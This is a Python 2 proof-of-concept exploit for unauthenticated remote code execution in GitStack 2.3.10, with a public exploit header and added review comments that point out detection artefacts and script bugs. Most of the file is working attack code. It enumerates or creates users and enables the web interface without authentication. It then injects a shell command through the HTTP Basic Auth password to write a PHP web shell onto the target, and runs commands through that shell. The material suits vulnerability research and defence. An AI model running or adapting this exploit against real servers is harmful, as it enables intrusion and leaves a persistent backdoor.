
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
#
#1. Description
#
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
#
#2. Proof of Concept
#
# NOTE(review): Python 2 script (bare `print` statements). Root cause, per the
# description above: the HTTP Basic Auth password that gitphp receives in
# $_SERVER['PHP_AUTH_PW'] is handed to exec() unescaped. Every /rest/... call
# below is made without any credentials, which is the "unauthenticated" part.
# Observable artefacts a defender can look for in this flow: unauthenticated
# POST/PUT/DELETE requests to /rest/user/, /rest/settings/general/webinterface/
# and /rest/repository/, a Basic Auth header on /web/index.php whose password
# contains shell metacharacters, and a new exploit.php under c:\GitStack\gitphp.
import requests
from requests.auth import HTTPBasicAuth
import os
import sys

# Target host. Every URL is built as plain http:// with no port, so the
# script assumes GitStack is reachable on port 80.
ip = '192.168.1.102'

# What command you want to execute
command = "whoami"

# Fallback names, only used when the target has no existing user/repository.
repository = 'rce'
username = 'rce'
password = 'rce'
# The same placeholder is sent as the csrftoken cookie and the
# csrfmiddlewaretoken form field (double-submit style); presumably the server
# only compares the two, so any value works -- not verified here.
csrf_token = 'token'

user_list = []

print "[+] Get user list"
try:
    # Unauthenticated user enumeration. 'everyone' is removed because it is
    # GitStack's catch-all entry rather than an account that can log in.
    r = requests.get("http://{}/rest/user/".format(ip))
    user_list = r.json()
    user_list.remove('everyone')
except:
    # Best-effort: a connection error, a non-JSON body, or 'everyone' being
    # absent all leave user_list empty and the script falls through to
    # creating an account. The bare except also hides an unreachable target.
    pass

if len(user_list) > 0:
    # An existing account is reused. Its real password is never needed: the
    # later Basic Auth request sends the injected string in its place.
    username = user_list[0]
    print "[+] Found user {}".format(username)
else:
    r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
    print "[+] Create user"

    # Success is detected by substring-matching the response body.
    # os._exit(0) reports success (status 0) to the caller even on failure.
    if not "User created" in r.text and not "User already exist" in r.text:
        print "[-] Cannot create user"
        os._exit(0)

# The PHP web front-end (/web/) has to be enabled for the later request to
# reach gitphp at all.
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
    print "[+] Web repository already enabled"
else:
    print "[+] Enable web repository"
    # Body is a raw JSON string here, unlike the form-encoded data= dicts
    # used for the other requests.
    r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
    if not "Web interface successfully enabled" in r.text:
        print "[-] Cannot enable web interface"
        os._exit(0)

print "[+] Get repositories list"
# No try/except here, unlike the user listing: a non-JSON response raises.
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()

if len(repository_list) > 0:
    repository = repository_list[0]['name']
    print "[+] Found repository {}".format(repository)
else:
    print "[+] Create repository"

    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
    if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
        print "[-] Cannot create repository"
        os._exit(0)

print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))

if not "added to" in r.text and not "has already" in r.text:
    print "[-] Cannot add user to repository"
    os._exit(0)

print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))

# NOTE(review): the success string hard-codes "rce" instead of using the
# `repository` variable, so when an existing repository was picked up above
# this check can only pass through the "not in list" alternative.
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
    print "[-] Cannot remove access for anyone"
    os._exit(0)

print "[+] Create backdoor in PHP"
# The injection point: the Basic Auth *password* is the payload. Per the
# description it reaches exec() via $_SERVER['PHP_AUTH_PW']; the Windows path
# under c:\GitStack shows the script is written for a Windows install.
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit.php'))

# NOTE(review): sys.stdout.encoding is None in Python 2 when stdout is not a
# tty (e.g. piped), in which case .encode(None, ...) raises TypeError.
print r.text.encode(sys.stdout.encoding, errors='replace')

print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')